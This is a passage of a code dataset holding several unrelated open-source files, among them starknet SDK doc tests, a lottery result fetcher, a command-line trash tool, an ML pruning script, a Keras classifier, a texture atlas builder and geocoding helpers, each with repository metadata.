full_node_client.get_class_hash_at(\n contract_address=address, block_number=\"latest\"\n )\n # docs-end: get_class_hash_at\n\n\n@pytest.mark.asyncio\nasync def test_get_class_by_hash(full_node_client, class_hash):\n # docs-start: get_class_by_hash\n hash_ = 0x1 or 1 or \"0x1\"\n # docs-end: get_class_by_hash\n hash_ = class_hash\n # docs-start: get_class_by_hash\n contract_class = await full_node_client.get_class_by_hash(class_hash=hash_)\n # docs-end: get_class_by_hash\n\n\n@pytest.mark.asyncio\nasync def test_get_transaction_by_block_id(full_node_client):\n # docs-start: get_transaction_by_block_id\n transaction = await full_node_client.get_transaction_by_block_id(\n index=0, block_number=\"latest\"\n )\n # docs-end: get_transaction_by_block_id\n\n\n@pytest.mark.asyncio\nasync def test_get_block_transaction_count(full_node_client):\n # docs-start: get_block_transaction_count\n num_of_transactions = await full_node_client.get_block_transaction_count(\n block_number=\"latest\"\n )\n # 
docs-end: get_block_transaction_count\n\n\n@pytest.mark.asyncio\nasync def test_get_class_at(full_node_client, contract_address):\n    # docs-start: get_class_at\n    address = 0x1 or 1 or \"0x1\"\n    # docs-end: get_class_at\n    address = contract_address\n    # docs-start: get_class_at\n    contract_class = await full_node_client.get_class_at(\n        contract_address=address, block_number=\"latest\"\n    )\n    # docs-end: get_class_at\n\n\n@pytest.mark.asyncio\nasync def test_get_contract_nonce(full_node_client, contract_address):\n    # docs-start: get_contract_nonce\n    address = 0x1 or 1 or \"0x1\"\n    # docs-end: get_contract_nonce\n    address = contract_address\n    # docs-start: get_contract_nonce\n    nonce = await full_node_client.get_contract_nonce(\n        contract_address=address, block_number=\"latest\"\n    )\n    # docs-end: get_contract_nonce\n", "repo_name": "chain-cpu/starknet-sdk", "sub_path": "starknet_py/tests/e2e/docs/code_examples/test_full_node_client.py", "file_name": "test_full_node_client.py", "file_ext": "py", "file_size_in_byte": 5175, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "starknet_py.net.full_node_client.FullNodeClient", "line_number": 15, "usage_type": "call"}, {"api_name": "starknet_py.net.networks.TESTNET", "line_number": 15, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 39, "usage_type": "attribute"}, {"api_name": "starkware.starknet.public.abi.get_storage_var_address", "line_number": 45, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 51, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 62, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 72, "usage_type": "attribute"}, {"api_name": "starknet_py.net.client_models.Call", "line_number": 85, "usage_type": "call"}, {"api_name": "starkware.starknet.public.abi.get_selector_from_name", "line_number": 87, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 95, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 108, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 119, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 128, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 137, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 150, "usage_type": "attribute"}]} +{"seq_id": "33322591725", "text": "# coding=utf-8\n__author__ = 'Feely'\n\nimport time\nimport multiprocessing\nimport sys\n\nimport DrawNO\nimport conn\nimport GDSFC\n\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\nsys.excepthook = lambda *args: None\nSTDERR = sys.stderr\n\n\n# Chongqing SSC (shishicai) lottery\ndef ssc_drawnumber(ssc_type,db_ssc_type):\n    returndate=''\n    while True:\n        # Call the scraper to fetch the draw results\n        assert isinstance(ssc_type, str)\n        draw_date,draw_code, draw_time_str= DrawNO.drawnumber(ssc_type)\n        if draw_code == '0' or draw_date <= returndate:\n            pass\n        else:\n            returndate=conn.kjdata(t2=draw_code,cid=db_ssc_type,t1=draw_date,t3=draw_time_str)\n            time.sleep(180)\n            # draw_time = datetime.strptime(draw_time_str, \"%Y-%m-%d %H:%M\")\n            # ms.IsInfoExists(SPname='ibc.dbo.IsInfoExists',lottery_type=db_ssc_type,lottery_num=draw_date,kjCodes=draw_code,kjtime=draw_time,addtime=datetime.now())\n            # time.sleep(1)\n            # 
ms.SYSPaiJiang(SPname='ibc.dbo.SYSPaiJiang',kjExpect=draw_date,kjTime=draw_time_str,kjCode=draw_code,ltType=db_ssc_type)\n        time.sleep(30)\n\ndef main():\n    \"\"\"\n\n    :rtype: None\n    \"\"\"\n    # Chongqing SSC (shishicai) lottery\n    ssc_type='cqssc'\n    db_ssc_type='1'\n    jobs=[]\n    for i in range(2):\n        p_cq=multiprocessing.Process(name='CQSSC',target=ssc_drawnumber,args=(ssc_type,db_ssc_type,))\n        jobs.append(p_cq)\n        p_cq.start()\n        p_cq.join(timeout=10)\nif __name__ == \"__main__\":\n    main()", "repo_name": "FeelySong/SJLottery", "sub_path": "kj/SSC/sjNumber.py", "file_name": "sjNumber.py", "file_ext": "py", "file_size_in_byte": 1460, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.setdefaultencoding", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.excepthook", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 16, "usage_type": "attribute"}, {"api_name": "DrawNO.drawnumber", "line_number": 25, "usage_type": "call"}, {"api_name": "conn.kjdata", "line_number": 29, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 30, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 35, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "27922822921", "text": "import os\nimport numpy as np\nimport json\nimport pickle as pkl\nimport matplotlib.pyplot as plt\n\nfrom PIL import Image\nfrom glob import glob\nfrom tqdm import tqdm\n\nfrom c2d_models import *\n\ndef load_json(file):\n    if \".json\" not in file: file += \".json\"\n    with open(file, \"r\") as f:\n        contents = json.load(f)\n    return contents\n\ndef dump_json(contents, file):\n    if \".json\" not in file: file += \".json\"\n    with open(file, \"w\") as f:\n        json.dump(contents, f)\n    return True\n\ndef load_pickle(file):\n    if \".pkl\" not in file: file += \".pkl\"\n    with open(file, \"rb\") as f:\n        contents = pkl.load(f)\n    return contents\n    \ndef dump_pickle(contents, file):\n    if \".pkl\" not in file: file += \".pkl\"\n    with open(file, \"wb\") as f:\n        pkl.dump(contents, f)\n    return True\n\ndef read_image(image_path, resize_to = None):\n    img = Image.open(image_path)\n    if resize_to != None:\n        img = img.resize(resize_to)\n    return np.array(img)\n\ndef save_image(image_array, file_path):\n    try:\n        image_array = im_to_255(image_array)\n        Image.fromarray(image_array).save(file_path)\n        return True\n    except Exception as e:\n        print(e)\n        return False\n\ndef join_paths(paths):\n    path = \"\"\n    for tag in paths:\n        path = os.path.join(path, tag)\n    return path\n\ndef read_directory_contents(directory):\n    if \"*\" not in directory: directory = join_paths([directory, \"*\"])\n    return sorted(glob(directory))\n\ndef create_directory(path):\n    if not os.path.exists(path): os.mkdir(path)\n    \ndef INFO(*list_of_strings):\n    list_of_strings = list(list_of_strings)\n    print(\"-\"*40)\n    print(\"\\n\".join(list_of_strings))\n    print(\"-\"*40)\n    \ndef normalize(x):\n    return (x - x.min())/(x.max() - x.min())\n\ndef im_to_255(x):\n    if x.max() <= 1: return (x*255).astype(np.uint8)\n    return x\n\ndef get_model(model_path, rec = True, max_value=1000):\n    if rec: model = C2D_AE_128_3x3(isTrain = True)\n    else: model = C2D_AE_128_3x3(isTrain = False, max_value = max_value)\n    model.model.load_weights(model_path)\n    return model.model\n\ndef im_3(x, channel_axis = -1):\n    if len(x.shape) < 3:\n        x = np.expand_dims(x, axis = channel_axis)\n    if x.shape[channel_axis] < 3:\n        x = x.repeat((1 + 3 - x.shape[channel_axis]), 
axis = channel_axis)\n return x\n ", "repo_name": "ambareeshravi/AD_AE_XAI", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 2326, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "json.load", "line_number": 16, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 22, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 28, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 34, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 38, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 38, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 46, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 46, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 75, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 86, "usage_type": "call"}]} +{"seq_id": "35394957031", "text": "import sys\nfrom base import make_app\n\n\nif __name__ == '__main__':\n\toptions = {}\n\tif len(sys.argv) > 1:\n\t\tif sys.argv[1] == 'upgradedb':\n\t\t\tfrom alembic.config import main\n\t\t\tmain('upgrade head'.split(' '), 'alembic')\n\t\n\t\t\texit(0)\n\t\tfor arg in sys.argv[1:]:\n\t\t\tk, v = arg.strip('--').split('=', 1)\n\t\t\toptions[k] = v\n\tapp = make_app(options)\n\tapp.run()\n", "repo_name": "yyotsuba/session_book", "sub_path": "run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 351, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.argv", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 8, "usage_type": "attribute"}, {"api_name": "alembic.config.main", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 13, "usage_type": "attribute"}, {"api_name": "base.make_app", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "19233700652", "text": "#!/usr/bin/env python3\n\nimport argparse\nimport os\nimport shutil\n\nTRASH = os.path.expanduser(\"~\") + \"/.trash/\"\n\ndef write_log(trash_path, orig_path):\n with open(TRASH + \"TRASH_LOG.log\", \"a\") as f:\n f.write(TRASH + trash_path + \"\\n\" + orig_path + \"\\n\")\n\n\ndef authenticate_path(file_to_rm):\n file_full = os.path.abspath(file_to_rm)\n file_name = os.path.split(file_full)[-1]\n dest_file_full = file_full\n dest_file_name = file_name\n # same name exists in trash\n if os.path.exists(TRASH + file_name):\n count = 0\n # find which number makes this a unique value\n while (os.path.exists(TRASH + file_name + \".\" + str(count))):\n count += 1\n dest_file_name += \".\" + str(count)\n dest_file_full += \".\" + str(count)\n\n return file_full, dest_file_full, file_name, dest_file_name\n\n\ndef recur(base, perm):\n if perm:\n shutil.rmtree(base)\n else:\n dir_full, dest_dir_full, dir_name, dest_dir_name = authenticate_path(base)\n shutil.move(dir_full, 
TRASH + dest_dir_name)\n write_log(dest_dir_name, dir_full)\n \n\ndef single(file_to_rm, perm):\n if not os.path.isfile(file_to_rm):\n print(\"Not a regular file!\")\n return\n if perm:\n os.remove(file_to_rm)\n else:\n file_full, dest_file_full, file_name, dest_file_name = authenticate_path(file_to_rm)\n shutil.move(file_full, TRASH + dest_file_name)\n write_log(dest_file_name, file_full)\n \n\n\n\n\ndef clean():\n recur(TRASH, True)\n os.mkdir(TRASH)\n f = open(TRASH + \"TRASH_LOG.log\", \"w+\")\n f.close()\n\n\ndef undo_delete():\n pairs = []\n with open(TRASH + \"TRASH_LOG.log\", \"r\") as log:\n for line in log:\n pairs.append(line.strip())\n\n # make sure there is value to restore\n if len(pairs) < 1:\n print(\"Your trash is empty.\")\n return\n\n # to_restore = [trash, dest]\n to_restore = []\n to_restore.append(pairs[-2])\n to_restore.append(pairs[-1])\n if os.path.exists(to_restore[1]):\n print(\"There will be a name error; resolve the conflict in the destination.\")\n return\n else:\n shutil.move(to_restore[0], to_restore[1])\n \n pairs = pairs[0:-2]\n with open(TRASH + \"TRASH_LOG.log\", \"w\") as log:\n # all but the last\n for p in pairs:\n log.write(p + \"\\n\")\n\n\nparser = argparse.ArgumentParser()\nremove_vs_clean = parser.add_mutually_exclusive_group()\nremove_vs_clean.add_argument(\"file\", help=\"Remove FILE to ~/.trash.\", \n metavar=\"FILE\", nargs=\"*\", action=\"append\", default=[])\nremove_vs_clean.add_argument(\"-r\", \"--recursive\", help=\"Remove directory to ~/.trash.\", \n metavar=\"DIR\", nargs=\"*\", action=\"append\", default=[])\nremove_vs_clean.add_argument(\"-e\", \"--empty-trash\", help=\"Empty ~/.trash.\", action=\"store_true\")\nremove_vs_clean.add_argument(\"-u\", \"--undo\", help=\"Undo last delete.\", action=\"store_true\")\nparser.add_argument(\"--permanent\", help=\"Permanently delete file or directory.\", action=\"store_true\")\n\nargs = parser.parse_args()\n\n\n# verify that the trash exists\nif not os.path.exists(TRASH):\n os.mkdir(TRASH)\nif not os.path.exists(TRASH + \"TRASH_LOG.log\"):\n f = open(TRASH + \"TRASH_LOG.log\", \"w\")\n f.close()\n\n# parse the arguments\nif args.recursive:\n for arg in args.recursive[0]: # not sure why, but args.recursive is 2d\n recur(arg, args.permanent)\n\nif args.file:\n for arg in args.file[0]: # again; not sure why, but args.file is 2d\n single(arg, args.permanent)\n\nif args.empty_trash:\n clean()\n\nif args.undo:\n undo_delete()\n\n", "repo_name": "ClaytonMcCray/fakeRM", "sub_path": "tr.py", "file_name": "tr.py", "file_ext": "py", "file_size_in_byte": 3659, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.expanduser", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 33, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 36, 
"usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 45, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 48, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "shutil.move", "line_number": 81, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path", "line_number": 104, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}]} +{"seq_id": "1832679764", "text": "import timm\nimport torch\nimport numpy as np\nfrom torchsummary import summary\n\nfrom nni.compression.pytorch.pruning import L1NormPruner\nfrom nni.compression.pytorch.speedup import ModelSpeedup\n\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef test_exclude():\n batch_size = 16\n inference_input = torch.randn(batch_size, 3, 360, 640).to(device)\n\n sparsity = 0.8\n model = timm.create_model('efficientnet_lite0', pretrained=True)\n model.to(device)\n print(\"Model Structure...\")\n print(model)\n\n print(\"\\nStarting Pruning Process...\")\n config_list = None\n # create pruned model\n config_list = [{\n 'sparsity_per_layer': sparsity,\n 'op_types': ['Linear', 'Conv2d']\n }, {\n 'exclude': True,\n 'op_names': ['conv_stem']\n }]\n\n print(\"\\nConfig List:\", config_list)\n\n dummy_input = torch.rand(1, 3, 360, 640).to(device)\n pruner = L1NormPruner(model, config_list)\n\n # compress the model and generate the masks\n _, masks = pruner.compress()\n\n # need to unwrap the model, if the model is wrapped before speedup\n pruner._unwrap_model()\n\n # speedup the model, for more information about speedup, please refer :doc:`pruning_speedup`.\n ModelSpeedup(model, dummy_input, masks).speedup_model()\n\n print(\"\\n\\n----------- Model Summary: Pruned at {}% with NNI -----------\\n\".format(sparsity * 100))\n if torch.cuda.is_available():\n model.cuda()\n summary(model, (3, 360, 640))\n\n\ntest_exclude()\n", "repo_name": "pmmitche/Masters-Thesis", "sub_path": "minimal_pruning_error_example.py", "file_name": "minimal_pruning_error_example.py", "file_ext": "py", "file_size_in_byte": 1503, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.device", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.randn", "line_number": 15, "usage_type": "call"}, {"api_name": "timm.create_model", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 36, "usage_type": "call"}, {"api_name": "nni.compression.pytorch.pruning.L1NormPruner", "line_number": 37, "usage_type": "call"}, {"api_name": "nni.compression.pytorch.speedup.ModelSpeedup", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 49, "usage_type": 
"call"}, {"api_name": "torch.cuda", "line_number": 49, "usage_type": "attribute"}, {"api_name": "torchsummary.summary", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "12976308799", "text": "from django.shortcuts import render, redirect\nfrom rest_framework import viewsets\n\nfrom .models import University\nfrom .serializers import UniversitySerializer\nfrom .forms import UniversityForm\n\n\ndef university(request):\n university = University.objects.using(\"university_db\").all()\n \n if request.method == \"POST\":\n form = UniversityForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect(\"/university\")\n else:\n form = UniversityForm()\n\n context = {\n 'university': university,\n 'form': form,\n }\n return render(request, \"university/university.html\", context)\n\n\nclass UniversityViewSet(viewsets.ModelViewSet):\n queryset = University.objects.using(\"university_db\").all()\n serializer_class = UniversitySerializer\n\n ", "repo_name": "surajkarki66/django-multiple-dbs-and-analytics", "sub_path": "university/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 809, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "models.University.objects.using", "line_number": 10, "usage_type": "call"}, {"api_name": "models.University.objects", "line_number": 10, "usage_type": "attribute"}, {"api_name": "models.University", "line_number": 10, "usage_type": "name"}, {"api_name": "forms.UniversityForm", "line_number": 13, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 16, "usage_type": "call"}, {"api_name": "forms.UniversityForm", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 24, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 27, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 27, "usage_type": "name"}, {"api_name": "models.University.objects.using", "line_number": 28, "usage_type": "call"}, {"api_name": "models.University.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "models.University", "line_number": 28, "usage_type": "name"}, {"api_name": "serializers.UniversitySerializer", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "17344435702", "text": "import math\nimport numpy as np\n\nfrom ..resource.workspace import Workspace\nfrom PIL import Image\nimport io\n\n\nclass Texture:\n \"\"\"\n Holds a texture with width, height and its texture data in rgba.\n \"\"\"\n def __init__(self):\n self.w = 0\n self.h = 0\n self.data = None # i = y * (w * 4) + x * 4 = (r, g, b, a)\n\n @classmethod\n def load_from_file(cls, workspace, location, enforce_square=True):\n \"\"\"\n Load a texture from a file\n\n :param enforce_square: if true, crop image to square (eliminates problems in things like animated textures)\n :param workspace: workspace to load from\n :type workspace: Workspace\n\n :param location: location of file\n :return:\n \"\"\"\n with workspace.get_file(location, 'rb') as f:\n im: Image.Image = Image.open(io.BytesIO(f.read()))\n im.load()\n self = cls()\n\n if im.width != im.height and enforce_square:\n # for now we just crop out animation frames\n im.crop((0, 0, im.width-1, im.width-1))\n\n self.w = im.width\n self.h = im.height\n if len(im.getbands()) == 3:\n im.putalpha(255)\n self.data = im.tobytes()\n return self\n\n\nclass ModelAtlas:\n TEX_SIZE = 128\n\n \"\"\"\n A ModelAtlas 
holds a bunch of textures on a grid, so the shader only needs one texture per block.\n\n Representation is a grid of 16x16 textures. (animated textures only use their first frame)\n Size is calculated once, and drawn at construction. Otherwise similar API to a :py:class:`Texture`.\n \"\"\"\n\n def __init__(self, textures):\n \"\"\"\n Create a new ModelAtlas\n\n :param textures: dictionary of names to :py:class:`Texture` instances\n \"\"\"\n self.textures = textures\n self.data = None\n self.size = [-1, -1]\n self._positions = {}\n\n self._layout()\n\n def _subgrid_layout(self, smaller, new_size, small_size, extra=()):\n \"\"\"\n Lay out a subgrid\n\n :param smaller: list of smaller tiles\n :param new_size: size to pack to\n :param small_size: incoming size\n :param extra: things that are already new_size\n :return: list of locations\n \"\"\"\n\n size_factor = new_size / small_size\n grids = [\n []\n ]\n\n c_pos = [0, 0]\n\n for i in smaller:\n grids[-1].append((i, c_pos.copy()))\n c_pos[0] += small_size\n if c_pos[0] == size_factor * small_size:\n c_pos[1] += small_size\n c_pos[0] = 0\n if c_pos[1] == size_factor * small_size:\n grids.append([])\n c_pos = [0, 0]\n\n if not grids[-1]:\n grids = grids[:-1]\n\n for i in extra:\n grids.append([(i, [0, 0])])\n\n return grids\n\n def _blit(self, texture, to):\n \"\"\"\n Blit a texture to the atlas. Also updates the entry in the _positions table\n\n .. danger::\n Only works while laying out, i.e. when the array is 3d\n\n :param texture: blit me\n :param to: here\n \"\"\"\n self._positions[texture] = to\n self.data[to[1]:to[1] + self.textures[texture].h, to[0]:to[0] + self.textures[texture].w] = \\\n np.frombuffer(self.textures[texture].data, dtype=np.uint8).reshape((self.textures[texture].h,\n self.textures[texture].w, 4))\n # that crazy thing does a blit with numpy magic (maybe) (hopefully)\n\n def _draw_grid(self, c_pos, grid):\n \"\"\"\n Recursively draw this grid, starting at c_pos\n\n :param c_pos: start at\n :param grid: draw this\n \"\"\"\n for element in grid:\n to_draw, at = element\n a_pos = c_pos[0] + at[0], c_pos[1] + at[1]\n if type(to_draw) is str:\n self._blit(to_draw, a_pos)\n else:\n self._draw_grid(a_pos, to_draw) # recurse into the nested sub-grid\n\n def _layout(self):\n \"\"\"\n Lay out the ModelAtlas\n \"\"\"\n\n size_filtered = {}\n sizes = []\n for i in self.textures:\n if self.textures[i].w in size_filtered:\n size_filtered[self.textures[i].w].append(i)\n else:\n size_filtered[self.textures[i].w] = [i]\n sizes.append(self.textures[i].w)\n sizes.sort()\n grids = []\n previous_size = sizes[0]\n for i in sizes:\n grids = self._subgrid_layout(grids, i, previous_size, size_filtered[i])\n previous_size = i\n\n h_size = sizes[-1]\n row_count = min(len(grids), ModelAtlas.TEX_SIZE // h_size)\n if row_count < 1:\n row_count = 1\n h_size = row_count * sizes[-1]\n columns = math.ceil(len(grids)/row_count)\n\n self.data = np.zeros((columns*sizes[-1], h_size, 4))\n\n c_pos = [0, 0]\n for i in grids:\n self._draw_grid(c_pos, i)\n c_pos[0] += sizes[-1]\n if c_pos[0] == h_size:\n c_pos[0] = 0\n c_pos[1] += sizes[-1]\n\n self.data = self.data.reshape(4*h_size*columns*sizes[-1])\n self.size = [h_size, columns*sizes[-1]]\n\n def uv_for(self, tex, u, v):\n \"\"\"\n Get the UV for a texture in this atlas\n\n :param tex: texture name\n :param u: u, in pixels\n :param v: v, in pixels\n :return: U, V (floats)\n \"\"\"\n c_pos = self._positions[tex]\n a_pos = c_pos[0] + u, c_pos[1] + v\n return a_pos[0] / self.size[0], a_pos[1] / self.size[1]\n", "repo_name": "mincrmatt12/MCJsonTool", 
"sub_path": "mcjsontool/render/texture.py", "file_name": "texture.py", "file_ext": "py", "file_size_in_byte": 5626, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "PIL.Image.Image", "line_number": 31, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 31, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 31, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 118, "usage_type": "attribute"}, {"api_name": "math.ceil", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 164, "usage_type": "call"}]} +{"seq_id": "23888546657", "text": "import pandas as pd\n\n#importa os dados e suas saidas\nprevisores = pd.read_csv('../breast_cancer_dataset/entradas_breast.csv')\nclasse = pd.read_csv('../breast_cancer_dataset/saidas_breast.csv')\n\nfrom sklearn.model_selection import train_test_split\nprevisores_treinamento, previsores_teste, classe_treinamento, classe_teste = train_test_split(previsores,classe, test_size =0.25)\n\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\nclassificador = Sequential()\n# formula de partida para o units\n# entradas + saidas /2\n# (30+1)/2 = 15,5 => 16 \n# primeira camada oculta\nclassificador.add(Dense(units = 16, activation='relu', \n kernel_initializer='random_uniform', input_dim = 30))\n# camada de saida\nclassificador.add(Dense(units = 1, activation='sigmoid'))\n\n# cria a rede e define alguns parametros de treinamento\nclassificador.compile(optimizer='adam', loss='binary_crossentropy',\n metrics=['binary_accuracy'])\n\n# batch_size = numero de registros até atualizar pesos\n# epochs = numero de ciclos completos de interação com os dados\nclassificador.fit(previsores_treinamento,classe_treinamento, batch_size=10, epochs=100)\n\nprevisoes = classificador.predict(previsores_teste)\nprevisoes = (previsoes >0.5)\n\nfrom sklearn.metrics import confusion_matrix, accuracy_score\n\nprecisao = accuracy_score(classe_teste,previsoes)\n\nmatrix = confusion_matrix(classe_teste,previsoes)\n\nresultado = classificador.evaluate(previsores_teste,classe_teste)\n", "repo_name": "Allanfd12/Curso-Deep-Learning", "sub_path": "breast_cancer/breast_cancer_simples/breast_cancer_simples.py", "file_name": "breast_cancer_simples.py", "file_ext": "py", "file_size_in_byte": 1506, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.read_csv", "line_number": 4, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 5, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 8, "usage_type": "call"}, {"api_name": "keras.models.Sequential", "line_number": 14, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 19, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 22, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 37, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "13579597660", "text": "#!/usr/bin/env python3\n\nfrom urllib.request import urlopen # for getplace\nimport json # for getplace\nimport urllib.request, urllib.parse, urllib.error, codecs # for 
geonames\n\ndef getplace(lon, lat):\n \"\"\"\n Convert lon, lat to country\n DS - adapted from http://stackoverflow.com/questions/20169467/how-to-convert-from-longitude-and-latitude-to-country-or-city\n \"\"\"\n url = \"http://maps.googleapis.com/maps/api/geocode/json?\"\n url += \"latlng=%s,%s&sensor=false\" % (lat, lon)\n v = urlopen(url).read()\n j = json.loads(v)\n try:\n components = j['results'][0]['address_components']\n except: \n return '-'\n\n #components = { 'types': {'country':'-', 'town':'-'}} \n country = town = None\n for c in components:\n #print('CTYPES ', c)\n #print('CTYPES ', c['types'])\n if \"country\" in c['types']:\n country = c['long_name']\n if \"postal_town\" in c['types']:\n town = c['long_name']\n return country #, town, continent\n\n\n#------------------------------------------------------------\n\"\"\"\nRetrieve a list of information about countries, pulled from GeoNames.\nDS adapted from: from https://www.djangosnippets.org/snippets/1049/\n\nExample entry:\n\n {u'Area(in sq km)': u'33843',\n u'Capital': u'Chi\\\\u015fin\\\\u0103u',\n u'Continent': u'EU',\n u'Country': u'Moldova',\n u'CurrencyCode': u'MDL',\n u'CurrencyName': u'Leu',\n u'EquivalentFipsCode': u'',\n u'ISO': u'MD',\n u'ISO-Numeric': u'498',\n u'ISO3': u'MDA',\n u'Languages': u'mo,ro,ru,gag,tr',\n u'Phone': u'373',\n u'Population': u'4324000',\n u'Postal Code Format': u'MD-####',\n u'Postal Code Regex': u'^(?:MD)*(\\\\d{4})$',\n u'fips': u'MD',\n u'geonameid': u'617790',\n u'neighbours': u'RO,UA',\n u'tld': u'.md'}\n\"\"\"\n\n\nCOUNTRY_INFO_URL = \"http://download.geonames.org/export/dump/countryInfo.txt\"\n\ndef get_geonames_country_data():\n \"Returns a list of dictionaries, each representing a country\"\n udata = 